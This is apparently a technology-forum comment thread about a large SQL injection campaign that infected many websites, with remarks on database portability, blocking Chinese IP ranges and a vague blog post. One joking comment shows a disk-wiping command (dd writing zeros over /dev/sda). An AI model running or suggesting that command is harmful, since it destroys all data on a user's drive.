Precompiler interfaces are the best, but who uses precompilers any more? Or you could just write as much as possible using stored procedures, but that has its own unique form of pain.

Re:SQL injection portability

[butlerm]

For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.

"Claims 132,000+"???

[Limburgher]

That makes it sound like people died of SQL injection. . .

Block China ISP blocks.

[cenc]

These are again Chinese based servers.

http://google.com/safebrowsing/diagnostic?site=318x.com/

Re:Block China ISP blocks.

[cenc]

It looks like most of the sites showing up infected in Google are almost overwhelmingly in China or Chinese language.This one has been circulating for a while.

Is everybody at risk?

[Myopic]

I have one Mac laptop and one Linux laptop. Will the rootkit be a problem for me?

Search in google?

[webdevvie]

No search link is provided..... is that to prevent clicking ? I'd like to do that search myself to check for any sites we run on our hosting platform.

Didn't work.

[antdude]

C:\>dd if=/dev/zero of=/dev/sda bs=8192
'dd' is not recognized as an internal or external command,
operable program or batch file.

Now what? [grin]

Re:Use MongoDB instead

[Major+Blud]

Mongo is document-oriented, not relational. You do realize that the two architectures serve completely different purposes right? I wouldn't bet that Mongo would be the right choice for a high-volume OLTP environment.

Re:Solution

[soundguy]

So...your solution to one single compromised address is to completely block 16 million potential paying customers in Australia, China, and various other Asian countries? You're unemployed and living in your mom's basement, aren't you? Shouldn't you be LARPing or something?

Re:SQL injection or XSS?

[garaged]

once u have a sql vuln u can put any script u like on the site, nice ha?

Re:AV Detection

[I)_MaLaClYpSe_(I]

You are right. However, this was a reply to this parent post.

Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?
On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?
The blog post is completely fucking useless.

The parent asked for recommendations for what end users could do to protect themselves and whether AV detection would catch it. Now why is your comment informative and mine is modded offtopic? I just pointed out to the parent poster, that some of the informations he claimed to be missing was actually in right in the TFA.